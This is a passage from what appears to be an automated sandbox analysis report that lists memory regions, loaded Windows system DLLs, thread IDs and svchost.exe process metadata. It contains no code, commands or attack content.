0x7fefcbe0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 3163 start_va = 0x7fefccb0000 end_va = 0x7fefccb6fff entry_point = 0x7fefccb0000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 3164 start_va = 0x7fefcdb0000 end_va = 0x7fefcdcafff entry_point = 0x7fefcdb0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 3165 start_va = 0x7fefcf00000 end_va = 0x7fefcf09fff entry_point = 0x7fefcf00000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 3166 start_va = 0x7fefd030000 end_va = 0x7fefd076fff entry_point = 0x7fefd030000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3167 start_va = 0x7fefd150000 end_va = 0x7fefd1aafff entry_point = 0x7fefd150000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 3168 start_va = 0x7fefd2c0000 end_va = 0x7fefd2c6fff entry_point = 0x7fefd2c0000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 3169 start_va = 0x7fefd2d0000 end_va = 0x7fefd324fff entry_point = 0x7fefd2d0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 3170 start_va = 0x7fefd330000 end_va = 0x7fefd346fff entry_point = 0x7fefd330000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3171 start_va = 0x7fefd8b0000 end_va = 0x7fefd8bafff entry_point = 0x7fefd8b0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 3172 start_va = 0x7fefd8e0000 end_va = 0x7fefd904fff entry_point = 0x7fefd8e0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3173 start_va = 0x7fefd910000 end_va = 0x7fefd91efff entry_point = 0x7fefd910000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3174 start_va = 0x7fefd920000 end_va = 0x7fefd9b0fff entry_point = 0x7fefd920000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 3175 start_va = 0x7fefda00000 end_va = 0x7fefda13fff entry_point = 0x7fefda00000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 3176 start_va = 0x7fefdad0000 end_va = 0x7fefdb3afff entry_point = 0x7fefdad0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3177 start_va = 0x7fefddf0000 end_va = 0x7fefdef8fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3178 start_va = 0x7fefdfa0000 end_va = 0x7fefe03efff entry_point = 0x7fefdfa0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3179 start_va = 0x7fefe220000 end_va = 0x7fefe24dfff entry_point = 0x7fefe220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3180 start_va = 0x7fefe380000 end_va = 0x7fefe45afff entry_point = 0x7fefe380000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3181 start_va = 0x7fefe4c0000 end_va = 0x7fefe4defff entry_point = 0x7fefe4c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3182 start_va = 0x7fefe4e0000 end_va = 0x7fefe52cfff entry_point = 0x7fefe4e0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3183 start_va = 0x7fefe530000 end_va = 0x7fefe53dfff entry_point = 0x7fefe530000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3184 start_va = 0x7fefe540000 end_va = 0x7fefe742fff entry_point = 0x7fefe540000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3185 start_va = 0x7fefe750000 end_va = 0x7fefe818fff entry_point = 0x7fefe750000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3186 start_va = 0x7fefe9a0000 end_va = 0x7fefea10fff entry_point = 0x7fefe9a0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3187 start_va = 0x7fefea20000 end_va = 0x7fefeab8fff entry_point = 0x7fefea20000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3188 start_va = 0x7feffad0000 end_va = 0x7feffb36fff entry_point = 0x7feffad0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3189 start_va = 0x7feffb40000 end_va = 0x7feffc6cfff entry_point = 0x7feffb40000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3190 start_va = 0x7feffc70000 end_va = 0x7feffd46fff entry_point = 0x7feffc70000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3191 start_va = 0x7feffd50000 end_va = 0x7feffd57fff entry_point = 0x7feffd50000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3192 start_va = 0x7feffdf0000 end_va = 0x7feffdf0fff entry_point = 0x7feffdf0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3193 start_va = 0x7fffff96000 end_va = 0x7fffff97fff entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 3194 start_va = 0x7fffff98000 end_va = 0x7fffff99fff entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 3195 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 3196 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 3197 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 3198 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 3199 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 3200 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 3201 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 3202 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 3203 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 3204 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 3205 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 3206 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3207 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 3208 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 3209 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 3210 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 3211 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 3212 start_va = 0x7fffffde000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Thread: id = 229 os_tid = 0x220 Thread: id = 230 os_tid = 0x6ac Thread: id = 231 os_tid = 0x6e8 Thread: id = 232 os_tid = 0x274 Thread: id = 233 os_tid = 0x4c4 Thread: id = 234 os_tid = 0x798 Thread: id = 235 os_tid = 0x778 Thread: id = 236 os_tid = 0x730 Thread: id = 237 os_tid = 0x6f4 Thread: id = 238 os_tid = 0x6e4 Thread: id = 239 os_tid = 0x5ac Thread: id = 240 os_tid = 0x4fc Thread: id = 241 os_tid = 0x128 Thread: id = 242 os_tid = 0x124 Thread: id = 243 os_tid = 0x120 Thread: id = 244 os_tid = 0xf4 Thread: id = 245 os_tid = 0xcc Thread: id = 246 os_tid = 0x3ec Thread: id = 315 os_tid = 0x704 Thread: id = 373 os_tid = 0x220 Thread: id = 413 os_tid = 0x1f0 Process: id = "19" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x1487d000" os_pid = "0x358" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "16" os_parent_pid = "0x320" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b9c6" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 3271 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3272 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3273 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3274 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3275 start_va = 0x50000 end_va = 0x51fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 3276 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3277 start_va = 0x70000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 3278 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3279 start_va = 0x160000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3280 start_va = 0x260000 end_va = 0x260fff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 3281 start_va = 0x270000 end_va = 0x270fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 3282 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 3283 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 3284 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3285 start_va = 0x2b0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 3286 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 3287 start_va = 0x3c0000 end_va = 0x547fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 3288 start_va = 0x550000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 3289 start_va = 0x560000 end_va = 0x6e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 3290 start_va = 0x6f0000 end_va = 0x7affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 3291 start_va = 0x7b0000 end_va = 0xba2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 3292 start_va = 0xbb0000 end_va = 0xbb3fff entry_point = 0xbb0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 3293 start_va = 0xbc0000 end_va = 0xbc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bc0000" filename = "" Region: id = 3294 start_va = 0xbd0000 end_va = 0xbd3fff entry_point = 0xbd0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 3295 start_va = 0xbe0000 end_va = 0xbe0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000be0000" filename = "" Region: id = 3296 start_va = 0xbf0000 end_va = 0xc6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 3297 start_va = 0xc70000 end_va = 0xc9ffff entry_point = 0xc70000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000018.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db") Region: id = 3298 start_va = 0xca0000 end_va = 0xcbbfff entry_point = 0xca0000 region_type = mapped_file name = "firewallapi.dll.mui" filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui") Region: id = 3299 start_va = 0xcd0000 end_va = 0xd4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 3300 start_va = 0xd50000 end_va = 0xdcffff entry_point = 0x0 region_type = private name = "private_0x0000000000d50000" filename = "" Region: id = 3301 start_va = 0xe10000 end_va = 0xe8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e10000" filename = "" Region: id = 3302 start_va = 0xe90000 end_va = 0x115efff entry_point = 0xe90000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3303 start_va = 0x1160000 end_va = 0x11dffff entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 3304 start_va = 0x1200000 end_va = 0x127ffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 3305 start_va = 0x1280000 end_va = 0x12fffff entry_point = 0x0 region_type = private name = "private_0x0000000001280000" filename = "" Region: id = 3306 start_va = 0x1330000 end_va = 0x13affff entry_point = 0x0 region_type = private name = "private_0x0000000001330000" filename = "" Region: id = 3307 start_va = 0x13b0000 end_va = 0x1415fff entry_point = 0x13b0000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 3308 start_va = 0x1420000 end_va = 0x149ffff entry_point = 0x0 region_type = private name = "private_0x0000000001420000" filename = "" Region: id = 3309 start_va = 0x14e0000 end_va = 0x155ffff entry_point = 0x0 region_type = private name = "private_0x00000000014e0000" filename = "" Region: id = 3310 start_va = 0x1590000 end_va = 0x159ffff entry_point = 0x0 region_type = private name = "private_0x0000000001590000" filename = "" Region: id = 3311 start_va = 0x15a0000 end_va = 0x161ffff entry_point = 0x0 region_type = private name = "private_0x00000000015a0000" filename = "" Region: id = 3312 start_va = 0x1660000 end_va = 0x166ffff entry_point = 0x0 region_type = private name = "private_0x0000000001660000" filename = "" Region: id = 3313 start_va = 0x1690000 end_va = 0x170ffff entry_point = 0x0 region_type = private name = "private_0x0000000001690000" filename = "" Region: id = 3314 start_va = 0x1720000 end_va = 0x179ffff entry_point = 0x0 region_type = private name = "private_0x0000000001720000" filename = "" Region: id = 3315 start_va = 0x17a0000 end_va = 0x181ffff entry_point = 0x0 region_type = private name = "private_0x00000000017a0000" filename = "" Region: id = 3316 start_va = 0x1820000 end_va = 0x189ffff entry_point = 0x0 region_type = private name = "private_0x0000000001820000" filename = "" Region: id = 3317 start_va = 0x1900000 end_va = 0x197ffff entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 3318 start_va = 0x1980000 end_va = 0x19fffff entry_point = 0x0 region_type = private name = "private_0x0000000001980000" filename = "" Region: id = 3319 start_va = 0x1a50000 end_va = 0x1acffff entry_point = 0x0 region_type = private name = "private_0x0000000001a50000" filename = "" Region: id = 3320 start_va = 0x1b00000 end_va = 0x1b7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b00000" filename = "" Region: id = 3321 start_va = 0x1b80000 end_va = 0x1bfffff entry_point = 0x0 region_type = private name = "private_0x0000000001b80000" filename = "" Region: id = 3322 start_va = 0x1c00000 end_va = 0x1cfffff entry_point = 0x0 region_type = private name = "private_0x0000000001c00000" filename = "" Region: id = 3323 start_va = 0x1d40000 end_va = 0x1dbffff entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 3324 start_va = 0x1de0000 end_va = 0x1e5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001de0000" filename = "" Region: id = 3325 start_va = 0x1ec0000 end_va = 0x1f3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ec0000" filename = "" Region: id = 3326 start_va = 0x1f90000 end_va = 0x200ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 3327 start_va = 0x2020000 end_va = 0x209ffff entry_point = 0x0 region_type = private name = "private_0x0000000002020000" filename = "" Region: id = 3328 start_va = 0x20b0000 end_va = 0x212ffff entry_point = 0x0 region_type = private name = "private_0x00000000020b0000" filename = "" Region: id = 3329 start_va = 0x2150000 end_va = 0x21cffff entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 3330 start_va = 0x21d0000 end_va = 0x2512fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021d0000" filename = "" Region: id = 3331 start_va = 0x2530000 end_va = 0x25affff entry_point = 0x0 region_type = private name = "private_0x0000000002530000" filename = "" Region: id = 3332 start_va = 0x2610000 end_va = 0x268ffff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 3333 start_va = 0x26c0000 end_va = 0x273ffff entry_point = 0x0 region_type = private name = "private_0x00000000026c0000" filename = "" Region: id = 3334 start_va = 0x2770000 end_va = 0x27effff entry_point = 0x0 region_type = private name = "private_0x0000000002770000" filename = "" Region: id = 3335 start_va = 0x27f0000 end_va = 0x28effff entry_point = 0x0 region_type = private name = "private_0x00000000027f0000" filename = "" Region: id = 3336 start_va = 0x2910000 end_va = 0x298ffff entry_point = 0x0 region_type = private name = "private_0x0000000002910000" filename = "" Region: id = 3337 start_va = 0x29a0000 end_va = 0x29affff entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 3338 start_va = 0x29b0000 end_va = 0x2a2ffff entry_point = 0x0 region_type = private name = "private_0x00000000029b0000" filename = "" Region: id = 3339 start_va = 0x2a30000 end_va = 0x2aaffff entry_point = 0x0 region_type = private name = "private_0x0000000002a30000" filename = "" Region: id = 3340 start_va = 0x2ab0000 end_va = 0x2abffff entry_point = 0x0 region_type = private name = "private_0x0000000002ab0000" filename = "" Region: id = 3341 start_va = 0x2b10000 end_va = 0x2b8ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b10000" filename = "" Region: id = 3342 start_va = 0x2b90000 end_va = 0x2c8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b90000" filename = "" Region: id = 3343 start_va = 0x2cc0000 end_va = 0x2d3ffff entry_point = 0x0 region_type = private name = "private_0x0000000002cc0000" filename = "" Region: id = 3344 start_va = 0x2d80000 end_va = 0x2dfffff entry_point = 0x0 region_type = private name = "private_0x0000000002d80000" filename = "" Region: id = 3345 start_va = 0x2e00000 end_va = 0x2efffff entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 3346 start_va = 0x2f70000 end_va = 0x2feffff entry_point = 0x0 region_type = private name = "private_0x0000000002f70000" filename = "" Region: id = 3347 start_va = 0x2ff0000 end_va = 0x30effff entry_point = 0x0 region_type = private name = "private_0x0000000002ff0000" filename = "" Region: id = 3348 start_va = 0x30f0000 end_va = 0x316ffff entry_point = 0x0 region_type = private name = "private_0x00000000030f0000" filename = "" Region: id = 3349 start_va = 0x3170000 end_va = 0x326ffff entry_point = 0x0 region_type = private name = "private_0x0000000003170000" filename = "" Region: id = 3350 start_va = 0x32e0000 end_va = 0x335ffff entry_point = 0x0 region_type = private name = "private_0x00000000032e0000" filename = "" Region: id = 3351 start_va = 0x3360000 end_va = 0x33dffff entry_point = 0x0 region_type = private name = "private_0x0000000003360000" filename = "" Region: id = 3352 start_va = 0x3400000 end_va = 0x347ffff entry_point = 0x0 region_type = private name = "private_0x0000000003400000" filename = "" Region: id = 3353 start_va = 0x34c0000 end_va = 0x353ffff entry_point = 0x0 region_type = private name = "private_0x00000000034c0000" filename = "" Region: id = 3354 start_va = 0x3560000 end_va = 0x35dffff entry_point = 0x0 region_type = private name = "private_0x0000000003560000" filename = "" Region: id = 3355 start_va = 0x3600000 end_va = 0x367ffff entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 3356 start_va = 0x3680000 end_va = 0x387ffff entry_point = 0x0 region_type = private name = "private_0x0000000003680000" filename = "" Region: id = 3357 start_va = 0x3880000 end_va = 0x3c7ffff entry_point = 0x0 region_type = private name = "private_0x0000000003880000" filename = "" Region: id = 3358 start_va = 0x3cd0000 end_va = 0x3d4ffff entry_point = 0x0 region_type = private name = "private_0x0000000003cd0000" filename = "" Region: id = 3359 start_va = 0x3d50000 end_va = 0x454ffff entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 3360 start_va = 0x4550000 end_va = 0x551ffff entry_point = 0x0 region_type = private name = "private_0x0000000004550000" filename = "" Region: id = 3361 start_va = 0x5590000 end_va = 0x560ffff entry_point = 0x0 region_type = private name = "private_0x0000000005590000" filename = "" Region: id = 3362 start_va = 0x5620000 end_va = 0x569ffff entry_point = 0x0 region_type = private name = "private_0x0000000005620000" filename = "" Region: id = 3363 start_va = 0x5710000 end_va = 0x578ffff entry_point = 0x0 region_type = private name = "private_0x0000000005710000" filename = "" Region: id = 3364 start_va = 0x57b0000 end_va = 0x582ffff entry_point = 0x0 region_type = private name = "private_0x00000000057b0000" filename = "" Region: id = 3365 start_va = 0x58b0000 end_va = 0x592ffff entry_point = 0x0 region_type = private name = "private_0x00000000058b0000" filename = "" Region: id = 3366 start_va = 0x5970000 end_va = 0x59effff entry_point = 0x0 region_type = private name = "private_0x0000000005970000" filename = "" Region: id = 3367 start_va = 0x5a00000 end_va = 0x5a7ffff entry_point = 0x0 region_type = private name = "private_0x0000000005a00000" filename = "" Region: id = 3368 start_va = 0x5a80000 end_va = 0x5c7ffff entry_point = 0x0 region_type = private name = "private_0x0000000005a80000" filename = "" Region: id = 3369 start_va = 0x5c90000 end_va = 0x5d0ffff entry_point = 0x0 region_type = private name = "private_0x0000000005c90000" filename = "" Region: id = 3370 start_va = 0x5dc0000 end_va = 0x5e3ffff entry_point = 0x0 region_type = private name = "private_0x0000000005dc0000" filename = "" Region: id = 3371 start_va = 0x5f50000 end_va = 0x5fcffff entry_point = 0x0 region_type = private name = "private_0x0000000005f50000" filename = "" Region: id = 3372 start_va = 0x778b0000 end_va = 0x779a9fff entry_point = 0x778b0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3373 start_va = 0x779b0000 end_va = 0x77acefff entry_point = 0x779b0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3374 start_va = 0x77ad0000 end_va = 0x77c78fff entry_point = 0x77ad0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3375 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3376 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3377 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3378 start_va = 0xffd20000 end_va = 0xffd2afff entry_point = 0xffd20000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 3379 start_va = 0x7fef2a60000 end_va = 0x7fef2a68fff entry_point = 0x7fef2a60000 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 3380 start_va = 0x7fef3fc0000 end_va = 0x7fef403dfff entry_point = 0x7fef3fc0000 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" 